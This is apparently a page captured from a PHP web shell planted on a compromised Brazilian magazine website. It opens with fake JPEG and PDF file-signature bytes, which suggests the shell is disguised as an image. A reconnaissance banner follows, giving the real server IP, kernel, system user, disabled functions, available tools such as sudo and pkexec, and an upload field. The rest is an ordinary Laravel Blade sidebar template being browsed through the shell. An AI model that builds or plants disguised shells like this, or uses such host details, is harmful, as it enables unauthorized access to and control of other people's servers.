ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 157.90.209.209 / Your IP : 216.73.216.185 [ Web Server : Apache System : Linux hcomm124.dns-wk.info 4.18.0-553.64.1.el8_10.x86_64 #1 SMP Mon Jul 28 12:01:56 EDT 2025 x86_64 User : evidenciarevista ( 1049) PHP Version : 7.2.34 Disable Function : exec,passthru,shell_exec,system Domains : 216 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/evidenciarevista/storage/framework/views/ |
Upload File : |
<div class="card margin-bottom"> <div class="card-block"> <h4 class="card-title text-orange text-center">Parceiros</h4> <div class="row"> <?php $__currentLoopData = $parceiros; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $parceiro): $__env->incrementLoopIndices(); $loop = $__env->getFirstLoop(); ?> <div class="col-12 margin-bottom"> <a href="<?php echo e($parceiro->url); ?>" target="_blank"> <img src="http://admin.evidenciarevista.com.br/uploads/parceiros/<?php echo e($parceiro->file); ?>" class="img-thumbnail" width="100%"> </a> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getFirstLoop(); ?> </div> </div> </div> <div class="card margin-bottom"> <div class="card-block"> <h4 class="card-title text-orange text-center">Colunistas</h4> <?php $__currentLoopData = $users; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $user): $__env->incrementLoopIndices(); $loop = $__env->getFirstLoop(); ?> <div class="colunistas link"> <a href="<?php echo e(route('user.show', ['id' => $user->id, 'slug' => Illuminate\Support\Str::slug($user->name)])); ?>"> <h6><?php echo e($user->name); ?></h6> </a> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getFirstLoop(); ?> </div> </div> <div class="card margin-bottom"> <div class="card-block"> <h4 class="card-title text-orange text-center">Categorias</h4> <?php $__currentLoopData = $categories; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $category): $__env->incrementLoopIndices(); $loop = $__env->getFirstLoop(); ?> <a href="<?php echo e(route('category.show', ['id' => $category->id,'slug' => Illuminate\Support\Str::slug($category->name)])); ?>"> <div class="categories"> <div class="anime-right"><?php echo e($category->name); ?></div> </div> </a> <?php endforeach; $__env->popLoop(); $loop = $__env->getFirstLoop(); ?> </div> </div> <div class="card margin-bottom"> <div class="card-block"> <h4 class="card-title text-orange text-center">Mais lidas</h4> <?php $__currentLoopData = $reads; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $post): $__env->incrementLoopIndices(); $loop = $__env->getFirstLoop(); ?> <div class="read"> <small> <div class="pull-left margin-right"><i class="fa fa-clock-o" aria-hidden="true"></i> <?php echo e(\Carbon\Carbon::parse($post->created_at)->diffForHumans()); ?></div> </small> <br> <a href="<?php echo e(route('post.show', ['id' => $post->id, 'slug' => Illuminate\Support\Str::slug($post->title)])); ?>"> <?php echo e($post->title); ?> </a> </div> <?php endforeach; $__env->popLoop(); $loop = $__env->getFirstLoop(); ?> </div> </div> <div class="card margin-bottom"> <div class="card-block"> <div class="fb-page" data-href="https://www.facebook.com/evidenciarevist/" data-small-header="true" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><blockquote cite="https://www.facebook.com/evidenciarevist/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/evidenciarevist/">Evidência Revista</a></blockquote></div> </div> </div> <div class="card margin-bottom"> <div class="card-block"> <h4 class="card-title text-orange text-center">Redes Sociais</h4> <div class="text-center"> <a href="https://www.facebook.com/evidenciarevist/" class="text-orange"><i class="fa fa-facebook-square fa-lg margin-right"></i></a> <a href="#" class="text-orange"><i class="fa fa-twitter-square fa-lg margin-right"></i></a> <a href="https://www.instagram.com/evidenciarevista/" class="text-orange"><i class="fa fa-instagram fa-lg"></i></a> </div> </div> </div>